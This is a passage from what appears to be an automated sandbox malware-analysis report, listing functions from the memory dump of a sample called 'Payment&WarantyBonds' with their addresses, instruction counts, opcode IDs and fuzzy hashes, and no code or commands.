                                                                                                                                                                                • Opcode Fuzzy Hash: 9fede5fb65dac9427aaa71d47a430cf12941e324b98de0cfb6e874b58cfc91ed
                                                                                                                                                                                • Instruction Fuzzy Hash: F1813271900609AFDB25CFA9C880BDEBBFAFF88354F144429E555E7250D770AE45CB90
                                                                                                                                                                                Function 0181C640 Relevance: .2, Instructions: 206COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4f105fcbc873f2a5202452895ef485cd4bf78f83bc646ff4a907397b27814974
                                                                                                                                                                                • Instruction ID: 04f8af29b3058d90c5e729b8aaedf88b73f524328ce152bbf60d1c6686272e93
                                                                                                                                                                                • Opcode Fuzzy Hash: 4f105fcbc873f2a5202452895ef485cd4bf78f83bc646ff4a907397b27814974
                                                                                                                                                                                • Instruction Fuzzy Hash: EE71CFB5D00229DFCB258F59D890BBEBBB8FF59714F14451AE946EB354E3709A00CBA0
                                                                                                                                                                                Function 018B47A0 Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8912b2e06e2b9dfc3a67d0b6bbba0d4e57eb593a23e34e426d7a27c64699272c
                                                                                                                                                                                • Instruction ID: 922fa80c6e3539f9bf442a883013889d4252a17516b3385b50d12ab6e6b46d05
                                                                                                                                                                                • Opcode Fuzzy Hash: 8912b2e06e2b9dfc3a67d0b6bbba0d4e57eb593a23e34e426d7a27c64699272c
                                                                                                                                                                                • Instruction Fuzzy Hash: 64718170900205EFDB20DF69D985E9ABBF9EF90300B24525EE601E739AE7319B40CF55
                                                                                                                                                                                Function 0181260B Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b48f2c5e565d42a2ecb2c360c0328a60c58605c8a9e4b4252e1f1d47d2a965a8
                                                                                                                                                                                • Instruction ID: 81fa86c00581c2a8cb0344e6b8470701f5b5b2c3f76d21bc924c137bc404cef7
                                                                                                                                                                                • Opcode Fuzzy Hash: b48f2c5e565d42a2ecb2c360c0328a60c58605c8a9e4b4252e1f1d47d2a965a8
                                                                                                                                                                                • Instruction Fuzzy Hash: 2471D5726042428FD316DF2CC480B66B7EAFF84314F1489A9E855CB39ADB34DE45CB91
                                                                                                                                                                                Function 0188035C Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                                • Instruction ID: fc107f28ba7421618abfc740d2cae220b48ae92db0a749b6dc4dee115962744b
                                                                                                                                                                                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                                • Instruction Fuzzy Hash: 60715E71A00619EFDB10EFA9C984EDEBBB9FF58710F104569E905E7250DB34EA05CBA0
                                                                                                                                                                                Function 018962A0 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 38932d225e69147905fad706bd145f350317aa31c8491cf345ab38fc42a84ed0
                                                                                                                                                                                • Instruction ID: 4f405117ba8f4b121e8e49c0dab902d3294433cd30be87069cc9afb90443f892
                                                                                                                                                                                • Opcode Fuzzy Hash: 38932d225e69147905fad706bd145f350317aa31c8491cf345ab38fc42a84ed0
                                                                                                                                                                                • Instruction Fuzzy Hash: E0710532200B05EFEB32DF58C884F56BBA6FF40764F284428E615C76A1EB75EA44DB50
                                                                                                                                                                                Function 01808AA0 Relevance: .2, Instructions: 197COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1b38299abb2b136b77666f0070646a438a2908e22443bc7e2fd23436da0c9170
                                                                                                                                                                                • Instruction ID: 4aa4ad2b8c1e4bc229889ea7a07ad13ed67c5b30d69af80756624cb794abd632
                                                                                                                                                                                • Opcode Fuzzy Hash: 1b38299abb2b136b77666f0070646a438a2908e22443bc7e2fd23436da0c9170
                                                                                                                                                                                • Instruction Fuzzy Hash: 0581AB72A0470A8FDB25CF9CD984BAEB7B6EB49314F15416ED904EB291C7749F80CB90
                                                                                                                                                                                Function 018D8324 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 99d48f0af964e81052eda863cca3c29f065b9ad8a781b7c2540c06cba773692d
                                                                                                                                                                                • Instruction ID: db0b38c259c67929a525d2606730204516d5f44221b99047320165508077bf1d
                                                                                                                                                                                • Opcode Fuzzy Hash: 99d48f0af964e81052eda863cca3c29f065b9ad8a781b7c2540c06cba773692d
                                                                                                                                                                                • Instruction Fuzzy Hash: 81711B71E00209AFDF15DF98C881FEEBBB9FB05754F104159F614E6290EB74AA05CB91
                                                                                                                                                                                Function 018BA250 Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 636de333609b9a39bbcb935e927d379c2d82b9918dd455c22dfbb2adf90fe02c
                                                                                                                                                                                • Instruction ID: a5f5a51298a40f6a37ebc75cc5e416b7faf5de51ae33ee825a18ea5c5d8fd3b8
                                                                                                                                                                                • Opcode Fuzzy Hash: 636de333609b9a39bbcb935e927d379c2d82b9918dd455c22dfbb2adf90fe02c
                                                                                                                                                                                • Instruction Fuzzy Hash: 3351BF72504716AFD715DE68C8C4E9BBBE8EBC5B54F000929BA40DB250DB74EE04CBA3
                                                                                                                                                                                Function 018A8350 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a3e35e52f9eea619e023725f119a3c020943f86a92a135aa683f0f5348d09692
                                                                                                                                                                                • Instruction ID: e4d656d3a6a92d0823a6f111406b613e808e900aa5de9d9c801bc9a01f33780a
                                                                                                                                                                                • Opcode Fuzzy Hash: a3e35e52f9eea619e023725f119a3c020943f86a92a135aa683f0f5348d09692
                                                                                                                                                                                • Instruction Fuzzy Hash: 5C51B170900709DFE721DF5AC880A6BFBF8BF55714F50461EE292D76A1C770A645CBA0
                                                                                                                                                                                Function 0183E443 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7a79d65552feec4a25bcf26b9c116ce01f5dc7d73d28ace3034aff7b7196ee2a
                                                                                                                                                                                • Instruction ID: 3bd717604c67db393f02ee2e1e71d4e41df1ed753d39f7cb5ddd8f18cfee5c0f
                                                                                                                                                                                • Opcode Fuzzy Hash: 7a79d65552feec4a25bcf26b9c116ce01f5dc7d73d28ace3034aff7b7196ee2a
                                                                                                                                                                                • Instruction Fuzzy Hash: 0E516D72600A09DFCB22EF69C980E6AB3FDFF58754F44046AE551D7260E734EA50CBA1
                                                                                                                                                                                Function 018A4180 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b6c6f115b5d83d1e241b1b9b5282cbd8eb777631e04c66d4e0292c63877163ad
                                                                                                                                                                                • Instruction ID: aa95a29925505a6121badde1b4e5ccd70fb78d5cf0c32a118955daabc6b3433d
                                                                                                                                                                                • Opcode Fuzzy Hash: b6c6f115b5d83d1e241b1b9b5282cbd8eb777631e04c66d4e0292c63877163ad
                                                                                                                                                                                • Instruction Fuzzy Hash: 0C5147716083469FEB54DF29C880A6BBBE5BFC8308F88492DF595C7250EB70DA05CB52
                                                                                                                                                                                Function 018245B1 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                                • Instruction ID: d6c1a24cce8f010816571f5bc86138bf31a801a55309653276ac3019abeb39b0
                                                                                                                                                                                • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                                • Instruction Fuzzy Hash: 03515E75E0422EAFDB16DF98C440BEEBBB9AF45754F044069EA11EB240D774DE84CBA0
                                                                                                                                                                                Function 0188E9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                                                                • Instruction ID: d2d65fdfcb6dac36c23666b6a5e546dd9ef5046ba45465703b0310c9e7a67fa2
                                                                                                                                                                                • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                                                                • Instruction Fuzzy Hash: 1A51A531D0021EEFEF21BF98C894BAEBB79AB00764F154665E912F7190D7309F408BA1
                                                                                                                                                                                Function 018C8B28 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ca6a7e910dca6a27e133687c09e25e304a6391104f19f72c94099075882e49c3
                                                                                                                                                                                • Instruction ID: 87d9bd973b24cc38151c642c7a08758f946846d7451799d1a16128cee71d959a
                                                                                                                                                                                • Opcode Fuzzy Hash: ca6a7e910dca6a27e133687c09e25e304a6391104f19f72c94099075882e49c3
                                                                                                                                                                                • Instruction Fuzzy Hash: 8541D5707816119BE729DB2DC894B7BBB9AEF92B20F04822DF955C7281DB34DB01C791
                                                                                                                                                                                Function 0188CBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e89ffab150bee3d79fad2b9446ff384838808a27745b716ae34b28ba82b9df78
                                                                                                                                                                                • Instruction ID: 15e122f5b8fa6e5c5a5ddfef0dc79d60c59030f3c5ba9c2e15546072a5c63dd0
                                                                                                                                                                                • Opcode Fuzzy Hash: e89ffab150bee3d79fad2b9446ff384838808a27745b716ae34b28ba82b9df78
                                                                                                                                                                                • Instruction Fuzzy Hash: 27515D7690021ADFCB20EFA9C98099EBBB9FF48354B254519D545E7708E734AF01CFA0
                                                                                                                                                                                Function 018CA9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                                                                • Instruction ID: 288ed2f4ae149c92f6bcb5813f0e2963c7f752bb0c636ddc9c9a3051d11d3d42
                                                                                                                                                                                • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                                                                • Instruction Fuzzy Hash: 2D41E97260171A9FD729CF1CC980A6AB7A9FF80714B05462EE912C7644FB30EE04C7D1
                                                                                                                                                                                Function 018301F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9a646f1fd4a61d202f9329118e43fe79ade0c4f8e72ec18893bb43681874b23c
                                                                                                                                                                                • Instruction ID: c7121d640282225335309f0e21e63dd67d24c3f4492382b8f67300e9add1dc79
                                                                                                                                                                                • Opcode Fuzzy Hash: 9a646f1fd4a61d202f9329118e43fe79ade0c4f8e72ec18893bb43681874b23c
                                                                                                                                                                                • Instruction Fuzzy Hash: 8841BC369002199BDB15DF98C440AEEBBB5BF88714F19826AF819F7340E7349E41CBA5
                                                                                                                                                                                Function 0182EBFC Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d52986ed9f3dfd18dafe18436a9c3e08c8fe213d05f96b8505aa4ee61b645290
                                                                                                                                                                                • Instruction ID: fe86b6468034a6c5e8c3a97b40280f305d0f75d41528036183ad82566e67bab1
                                                                                                                                                                                • Opcode Fuzzy Hash: d52986ed9f3dfd18dafe18436a9c3e08c8fe213d05f96b8505aa4ee61b645290
                                                                                                                                                                                • Instruction Fuzzy Hash: A541D2722103059FD725EF6CC880A57B7EAFF98328F10492EE657C7215EB34EA848B55
                                                                                                                                                                                Function 01842750 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                                                                • Instruction ID: 8a1a98a87f62742a445cd2de2ee56e47a41b84a13ee01bc2eac159509957aedd
                                                                                                                                                                                • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                                                                • Instruction Fuzzy Hash: 6B514775A00219DFCB19CF98C480AAEF7B6FF84714F2881A9D915E7351D730EA82CB90
                                                                                                                                                                                Function 01806154 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fd5b373e4e6f1b6022305e84c750d7a3cc5ae0f74c99cc54ca76eeb4eae806c5
                                                                                                                                                                                • Instruction ID: 64f1849af70932adb9de2951c4f7dbe30a3552b6a2211e1bc930339b97e3cdc1
                                                                                                                                                                                • Opcode Fuzzy Hash: fd5b373e4e6f1b6022305e84c750d7a3cc5ae0f74c99cc54ca76eeb4eae806c5
                                                                                                                                                                                • Instruction Fuzzy Hash: F451077090020BDBDB66CB28CC00BA8BBB5FF11314F2442A9E525D72C5E7345B91CF45
                                                                                                                                                                                Function 01800BCD Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0fc248ab343df0457e1ad3ce41ec2b3deb27929d0f65f537e8dd26f80249359c
                                                                                                                                                                                • Instruction ID: 23342c7d8cc3c561609ec7f5432e3ffcada95b74e3aaffb8c5ebf8911554ef0a
                                                                                                                                                                                • Opcode Fuzzy Hash: 0fc248ab343df0457e1ad3ce41ec2b3deb27929d0f65f537e8dd26f80249359c
                                                                                                                                                                                • Instruction Fuzzy Hash: 0D415E35A0022D9BDB62DF6CCD40BEAB7B9EF45750F0100A5E948EB281D6749F84CB92
                                                                                                                                                                                Function 018C866E Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                                                • Instruction ID: 1a2cc9afc562d1d77fa53d5e7685e7c2e86af7e1f8a6b322ed1d2569f5b4f36b
                                                                                                                                                                                • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                                                • Instruction Fuzzy Hash: 5E417475B40105ABEB15DB99CC84AAFBBBAAF89B10F14806DE905E7341DB74DF0187A0
                                                                                                                                                                                Function 01800887 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e555340c50e54e1f280741427bf35962a18c0d0cf10ae35caf4a23ebc36a30f9
                                                                                                                                                                                • Instruction ID: 67eefe80efc6d678fb435df5d096a599b6b21dcf81c307735a24f3339b94ffa8
                                                                                                                                                                                • Opcode Fuzzy Hash: e555340c50e54e1f280741427bf35962a18c0d0cf10ae35caf4a23ebc36a30f9
                                                                                                                                                                                • Instruction Fuzzy Hash: B041B0716007099FE366CF28CC80A22B7F9FF49354B104A6EE547C6A91E730EA45CB91
                                                                                                                                                                                Function 0182A470 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5bd890f0b16ae012d5b0b8fcf428d1f23174056b976cb9b7726cfbeb0a56db39
                                                                                                                                                                                • Instruction ID: 209fc46dfbc63ac349f248029ca3aac7736a0d8f5c02b50a1b9cbc66abe802e6
                                                                                                                                                                                • Opcode Fuzzy Hash: 5bd890f0b16ae012d5b0b8fcf428d1f23174056b976cb9b7726cfbeb0a56db39
                                                                                                                                                                                • Instruction Fuzzy Hash: 4741AC32940629CFDB2ADFA8C984BAA7BB5FF14314F14015AE411E7695DB349B80CFA0
                                                                                                                                                                                Function 01808BF0 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6815f9a2a3421699daddc72e5676f68b0772c686a3dfe3d3b1eff99088af790a
                                                                                                                                                                                • Instruction ID: 33bc181c7355f7db8eba9d6eb1cec601ed47ca9b93bffae2c25be8163aeecd38
                                                                                                                                                                                • Opcode Fuzzy Hash: 6815f9a2a3421699daddc72e5676f68b0772c686a3dfe3d3b1eff99088af790a
                                                                                                                                                                                • Instruction Fuzzy Hash: 4B41F332D0020ACBD7669F4CC880A6BBBB6FB96704F14812ED905DB295C7359B81CF90
                                                                                                                                                                                Function 017F8918 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ba126b95cda2b9e53047e9776a3dcadaca9a90a504e4624abc9c228d1ff54123
                                                                                                                                                                                • Instruction ID: bf89dd628efe969e371c7b67cc2c00dcc1c5997af0a510d44688198bd32b72d6
                                                                                                                                                                                • Opcode Fuzzy Hash: ba126b95cda2b9e53047e9776a3dcadaca9a90a504e4624abc9c228d1ff54123
